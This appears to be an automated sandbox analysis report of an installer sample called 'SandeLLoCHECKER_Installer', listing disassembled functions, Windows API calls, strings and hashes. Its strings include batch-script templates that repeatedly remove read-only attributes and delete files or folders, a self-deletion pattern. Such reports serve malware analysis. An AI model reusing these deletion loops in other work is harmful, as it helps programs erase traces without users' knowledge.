                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Create$FileNamedPipe
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1328467360-0
                                                                                                                        • Opcode ID: f877811203bf0ba5d115a1b3a30c28f7e44d486a23518ec9584a8c970c3857ae
                                                                                                                        • Instruction ID: df6e983f932a30340201bbaa5b6dd51d850e4b3958c8e61738cd29835716bf90
                                                                                                                        • Opcode Fuzzy Hash: f877811203bf0ba5d115a1b3a30c28f7e44d486a23518ec9584a8c970c3857ae
                                                                                                                        • Instruction Fuzzy Hash: E3310631A84745BFE731CF14CC05B9ABBA8EB01730F10826EF9A9976D0DB71A940CB94
                                                                                                                        Function 0087BBA0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __set_se_translator.LIBVCRUNTIME ref: 0087BBB8
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(0095F970), ref: 0087BBCE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled__set_se_translator
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2480343447-0
                                                                                                                        • Opcode ID: 3be488da31cd116897f58f4c15ab916d3c022e0061535c5cb882f279e64a3ede
                                                                                                                        • Instruction ID: c46ae0b58e5b2406b3b6eff8f647bb5ed8e1ecbdbd448ffcfa45379c9ad17006
                                                                                                                        • Opcode Fuzzy Hash: 3be488da31cd116897f58f4c15ab916d3c022e0061535c5cb882f279e64a3ede
                                                                                                                        • Instruction Fuzzy Hash: 91E02622A04340BECA10D360AC09F4E3F50FBD2B25F088065FA0053161CB71984883A1
                                                                                                                        Function 009AAE10 Relevance: 1.5, APIs: 1, Instructions: 49comCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 009659D0: __Init_thread_footer.LIBCMT ref: 00965AB0
                                                                                                                        • CoCreateInstance.COMBASE(00AAA0D8,00000000,00000001,00AC75E0,000000B0), ref: 009AAE8E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateInit_thread_footerInstance
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3436645735-0
                                                                                                                        • Opcode ID: 3bf8286a03d214d457d0f33b939026baa39940147af94f66505ca875e4876fd4
                                                                                                                        • Instruction ID: d06907b79a5979de670c73240e446ad03e77e5a8575db5e92b6459c605f911a2
                                                                                                                        • Opcode Fuzzy Hash: 3bf8286a03d214d457d0f33b939026baa39940147af94f66505ca875e4876fd4
                                                                                                                        • Instruction Fuzzy Hash: 56118B71604705EBD7208F59D805B5ABBF8FB45B20F204A5EE8259B6C0D7BA6904CB91
                                                                                                                        Function 009A69A0 Relevance: .2, Instructions: 151COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Init_thread_footer$CreateHeapInstanceProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3807588171-0
                                                                                                                        • Opcode ID: 2216afe483a9f6fc6eb2c86e8ed06ab4aa8e448fade62e28007a7e3a3f5408d2
                                                                                                                        • Instruction ID: 1cc06f728dd4d9ed44128e54b98791a189a1f3fc7a5568aecb7f307d6bf08ad6
                                                                                                                        • Opcode Fuzzy Hash: 2216afe483a9f6fc6eb2c86e8ed06ab4aa8e448fade62e28007a7e3a3f5408d2
                                                                                                                        • Instruction Fuzzy Hash: 656134B0504B48CFE710CF28C50879ABBF0FF55318F148A5CD58A9B782D7B9A609CB91
                                                                                                                        Function 009759B0 Relevance: 37.4, APIs: 11, Strings: 10, Instructions: 633libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?,SystemFolder,0000000C,?,?,?), ref: 00975BB3
                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00975CAE
                                                                                                                        • GetWindowsDirectoryW.KERNEL32(?,00000104,WindowsFolder,0000000D,?,?,?), ref: 00975DA6
                                                                                                                        • GetWindowsDirectoryW.KERNEL32(?,00000104,WindowsVolume,0000000D,?,?,?), ref: 00975E85
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,WindowsVolume,0000000D,?,?,?), ref: 00975FC1
                                                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,?,WindowsVolume,0000000D,?,?,?), ref: 009760A2
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00976116
                                                                                                                        • LoadLibraryW.KERNEL32(shfolder.dll,?,?,?), ref: 0097612C
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0097615E
                                                                                                                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 00976213
                                                                                                                        • SHGetMalloc.SHELL32(00000000), ref: 0097622C
                                                                                                                          • Part of subcall function 0084A8A0: RtlAllocateHeap.NTDLL(?,00000000,?,C7BA013E,00000000,00A3DE90,000000FF,?,?,00B277EC,?,009A5D66,8000000B,C7BA013E), ref: 0084A8EA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Directory$FolderPathWindows$AddressAllocateFileFromHeapInit_thread_footerLibraryListLoadLocationMallocModuleNameProcSpecialSystem
                                                                                                                        • String ID: ProgramFiles64Folder$ProgramW6432$SETUPEXEDIR$SHGetFolderPathW$System32Folder$SystemFolder$TempFolder$WindowsFolder$WindowsVolume$shfolder.dll
                                                                                                                        • API String ID: 2816963309-2142986682
                                                                                                                        • Opcode ID: 999f91d569947202d129c8e51b1a6c1b9ddf204d175ffe209b939b8f9873523e
                                                                                                                        • Instruction ID: 472c3dbfa7645c6c9eb5802823d8bf32ac6ef9382beafcf2bdfbd2c58d7b50f9
                                                                                                                        • Opcode Fuzzy Hash: 999f91d569947202d129c8e51b1a6c1b9ddf204d175ffe209b939b8f9873523e
                                                                                                                        • Instruction Fuzzy Hash: E9321672600A059BDB68DF28CC55BBAB3B9FF50300F1582ACD51ADB292EF719E41CB51
                                                                                                                        Function 009478F0 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 327libraryloaderfileCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 217 9478f0-94792e call 84abe0 220 947930-94795c 217->220 221 9479ae-947a0b call 84a8a0 call 947e10 call 960970 217->221 226 94795e-947979 call 949690 220->226 227 94797b-947996 call 949690 220->227 235 947a10-947a2f call 84a3d0 221->235 234 947999-9479ab 226->234 227->234 238 947a80-947ad2 call 949800 GetModuleHandleW 235->238 239 947a31-947a5a call 947f20 call 862300 235->239 244 947ad4-947ae8 call a162a2 238->244 245 947b0c-947b13 238->245 254 947a64-947a7a MoveFileW call 960970 239->254 255 947a5c-947a5f 239->255 244->245 260 947aea-947b09 GetProcAddress call a16258 244->260 248 947b15 245->248 249 947b1c-947b2a 245->249 248->249 251 947b64-947b6b 249->251 252 947b2c-947b40 call a162a2 249->252 258 947b74-947b82 251->258 259 947b6d 251->259 252->251 268 947b42-947b61 GetProcAddress call a16258 252->268 254->238 269 947e01-947e0b call a21697 254->269 255->254 263 947b84-947b98 call a162a2 258->263 264 947bbc-947bc3 258->264 259->258 260->245 263->264 279 947b9a-947bb9 GetProcAddress call a16258 263->279 266 947bc5 264->266 267 947bcc-947d77 264->267 266->267 273 947d81-947d93 call 91d900 267->273 268->251 283 947d95-947db5 call 9492f0 273->283 279->264 286 947db7-947dba 283->286 287 947dbf-947dd4 283->287 286->287 288 947dd6-947dd9 287->288 289 947dde-947e00 call a15d9a 287->289 288->289
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0084ABE0: GetProcessHeap.KERNEL32 ref: 0084AC35
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084AC67
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084ACF2
                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00947A6A
                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32,?), ref: 00947AAC
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00947AF4
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetDllDirectory), ref: 00947B4C
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00947B5C
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00947BA4
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00947B04
                                                                                                                          • Part of subcall function 00A16258: EnterCriticalSection.KERNEL32(00B2FE4C,?,?,0084ACF7,00B30A7C,00A9D9D0), ref: 00A16262
                                                                                                                          • Part of subcall function 00A16258: LeaveCriticalSection.KERNEL32(00B2FE4C,?,0084ACF7,00B30A7C,00A9D9D0), ref: 00A16295
                                                                                                                          • Part of subcall function 00A16258: RtlWakeAllConditionVariable.NTDLL ref: 00A1630C
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00947BB4
                                                                                                                          • Part of subcall function 0091D900: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 0091D941
                                                                                                                        Strings
                                                                                                                        • @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try rd "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls, xrefs: 00947967, 0094796F
                                                                                                                        • @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1del "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r ", xrefs: 00947987
                                                                                                                        • SetSearchPathMode, xrefs: 00947AEE
                                                                                                                        • SetDefaultDllDirectories, xrefs: 00947B9E
                                                                                                                        • kernel32, xrefs: 00947AA7
                                                                                                                        • @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1rd "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r ", xrefs: 00947980, 0094798F
                                                                                                                        • @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try del "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls, xrefs: 00947962
                                                                                                                        • kernel32.dll, xrefs: 00947CAF
                                                                                                                        • SetDllDirectory, xrefs: 00947B46
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Init_thread_footer$AddressProc$CriticalSection$ConditionDirectoryEnterFileHandleHeapLeaveModuleMoveProcessSystemVariableWake
                                                                                                                        • String ID: @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try del "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try rd "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1rd "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r "$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1del "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r "$SetDefaultDllDirectories$SetDllDirectory$SetSearchPathMode$kernel32$kernel32.dll
                                                                                                                        • API String ID: 3437638698-3455668873
                                                                                                                        • Opcode ID: 21b41434167619abe3e8a3a1f92e0e08d02725a9b2698c3cb491744200d18f19
                                                                                                                        • Instruction ID: 28dec3916109d6a89fa6dd1b052ae8c0bca33921a6098ab9374dadcb7c9fd6fd
                                                                                                                        • Opcode Fuzzy Hash: 21b41434167619abe3e8a3a1f92e0e08d02725a9b2698c3cb491744200d18f19
                                                                                                                        • Instruction Fuzzy Hash: 0EE13EB0901249EFDB20DF68CC49FDEBBB4FF45318F558259E8189B292D7719A08CB51
                                                                                                                        Function 0097BCE0 Relevance: 25.5, APIs: 10, Strings: 4, Instructions: 1007threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetActiveWindow.USER32 ref: 0097BEB0
                                                                                                                        • SetLastError.KERNEL32(0000000E), ref: 0097BECD
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0097BEE5
                                                                                                                        • EnterCriticalSection.KERNEL32(00B3683C), ref: 0097BF02
                                                                                                                        • LeaveCriticalSection.KERNEL32(00B3683C), ref: 0097BF25
                                                                                                                        • DialogBoxParamW.USER32(000007D0,00000000,008BA230,00000000), ref: 0097BF42
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?), ref: 0097C0F4
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 0097C128
                                                                                                                          • Part of subcall function 00949600: MultiByteToWideChar.KERNEL32(00000003,00000000,00986984,000000FF,00000000,00000000,00000000,00AAC2BE,?,00986984,00AAC2BE), ref: 00949618
                                                                                                                          • Part of subcall function 00949600: MultiByteToWideChar.KERNEL32(00000003,00000000,00986984,000000FF,?,-00000001,?,00986984,00AAC2BE), ref: 0094964A
                                                                                                                        • SetEvent.KERNEL32(?,?,00000000,?,00000001,?,?), ref: 0097C2FD
                                                                                                                        • SetEvent.KERNEL32(?,?,00000000,?,?), ref: 0097C36F
                                                                                                                          • Part of subcall function 009891C0: DeleteFileW.KERNEL32(?,?,00000000,?,C7BA013E,80004005,?,00000000,?,?,C7BA013E,?,00000000), ref: 009891EB
                                                                                                                          • Part of subcall function 0084ABE0: GetProcessHeap.KERNEL32 ref: 0084AC35
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084AC67
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084ACF2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$CriticalEventInit_thread_footerSection$ActiveCurrentDeleteDialogEnterErrorFileHeapLastLeaveParamProcessThreadWindow
                                                                                                                        • String ID: v$Advinst_Extract_$Code returned to Windows by setup:$FILES.7z
                                                                                                                        • API String ID: 2923632737-2516696193
                                                                                                                        • Opcode ID: e57075c808f253089d2c2a2073fd22259485bee6913390efca30d0126cd0cbe1
                                                                                                                        • Instruction ID: abee14147be664230b2c1b779bbd220da4280207acc787f0d04125ebb7000261
                                                                                                                        • Opcode Fuzzy Hash: e57075c808f253089d2c2a2073fd22259485bee6913390efca30d0126cd0cbe1
                                                                                                                        • Instruction Fuzzy Hash: C992C171900249DFDB14DBA8CC49BDEBBB8FF45314F1482A9E409AB292DB749E44CF91
                                                                                                                        Function 0097C020 Relevance: 25.3, APIs: 3, Strings: 11, Instructions: 774COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0084ABE0: GetProcessHeap.KERNEL32 ref: 0084AC35
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084AC67
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084ACF2
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?), ref: 0097C0F4
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 0097C128
                                                                                                                          • Part of subcall function 0084A190: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,00000000,0084A308,-00000010,?,00000000), ref: 0084A1B3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharInit_thread_footerMultiWide$FindHeapProcessResource
                                                                                                                        • String ID: %hu$A valid language was received from commnad line. This is:$AI_BOOTSTRAPPERLANGS$Advinst_Extract_$Code returned to Windows by setup:$Language of a related product is:$Language selected programatically for UI:$Language used for UI:$Languages of setup:$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\$Software\Caphyon\Advanced Installer\
                                                                                                                        • API String ID: 1419962739-297406034
                                                                                                                        • Opcode ID: 0fa5a46db5e8ea573baac4ccf707f754f5f5db78c15cbf0d0024275617cd59a9
                                                                                                                        • Instruction ID: a87792438135438e3194eaa42f0efd1e0281d7dad50d912c6e5345b9f4c8e779
                                                                                                                        • Opcode Fuzzy Hash: 0fa5a46db5e8ea573baac4ccf707f754f5f5db78c15cbf0d0024275617cd59a9
                                                                                                                        • Instruction Fuzzy Hash: AC52D471A006099FDB14DB68CC55BEEB7B9FF45314F14816CE819EB292EB349E04CB91
                                                                                                                        Function 0098AB20 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 179threadCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1621 98ab20-98ab51 1622 98ad16-98ad27 1621->1622 1623 98ab57-98ab71 GetActiveWindow 1621->1623 1624 98ab7f-98ab87 1623->1624 1625 98ab73-98ab75 call 9822e0 1623->1625 1627 98ab89-98ab93 call a15943 1624->1627 1628 98aba2-98abb1 call a15a45 1624->1628 1629 98ab7a KiUserCallbackDispatcher 1625->1629 1627->1628 1634 98ab95-98ab9d SetLastError 1627->1634 1635 98ad3f-98ad46 call 8597d0 1628->1635 1636 98abb7-98ac1c GetCurrentThreadId EnterCriticalSection CreateDialogParamW 1628->1636 1629->1624 1638 98ac22-98ac39 GetCurrentThreadId 1634->1638 1640 98ad4b-98ad55 call 84a8a0 1635->1640 1636->1638 1643 98ac3b-98ac42 1638->1643 1644 98ac9e 1638->1644 1647 98ac44-98ac50 call 862300 call 96b0a0 1643->1647 1648 98ac55-98ac92 call 963f80 call 849c00 1643->1648 1645 98aca1-98acc9 SetWindowTextW GetDlgItem SetWindowTextW 1644->1645 1645->1622 1649 98accb-98acd4 call 84abe0 1645->1649 1647->1648 1648->1645 1660 98ac94-98ac9c 1648->1660 1649->1640 1658 98acd6-98acf8 call 84a190 1649->1658 1665 98ad2a-98ad3d GetDlgItem SetWindowTextW 1658->1665 1666 98acfa-98ad0c 1658->1666 1660->1645 1665->1666 1666->1622 1667 98ad0e-98ad11 1666->1667 1667->1622
                                                                                                                        APIs
                                                                                                                        • GetActiveWindow.USER32 ref: 0098AB5A
                                                                                                                        • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?), ref: 0098AB97
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0098AC22
                                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 0098ACAC
                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0098ACB6
                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 0098ACC2
                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 0098AD2F
                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 0098AD37
                                                                                                                          • Part of subcall function 009822E0: GetDlgItem.USER32(?,00000002), ref: 00982300
                                                                                                                          • Part of subcall function 009822E0: GetWindowRect.USER32(00000000,?), ref: 00982316
                                                                                                                          • Part of subcall function 009822E0: ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,0098AB7A,?,?,?,?,?,?), ref: 0098232F
                                                                                                                          • Part of subcall function 009822E0: InvalidateRect.USER32(00000000,00000000,00000001,?,?,?,?,?,?,?,0098AB7A,?,?), ref: 0098233A
                                                                                                                          • Part of subcall function 009822E0: GetDlgItem.USER32(00000000,000003E9), ref: 0098234C
                                                                                                                          • Part of subcall function 009822E0: GetWindowRect.USER32(00000000,?), ref: 00982362
                                                                                                                          • Part of subcall function 009822E0: SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000206,?,?,?,?,?,?,?,0098AB7A), ref: 009823A5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Item$RectText$ActiveCurrentErrorInvalidateLastShowThread
                                                                                                                        • String ID: v
                                                                                                                        • API String ID: 127311041-3261393531
                                                                                                                        • Opcode ID: 70a37ea31eeac06dbc327b2d056c3dadbc4757cc8e8f3f1419af617a97f46b16
                                                                                                                        • Instruction ID: 2931796662f5b478d69264f5d22bd7ca9e4b2e72bdde2d479e5148469d15d400
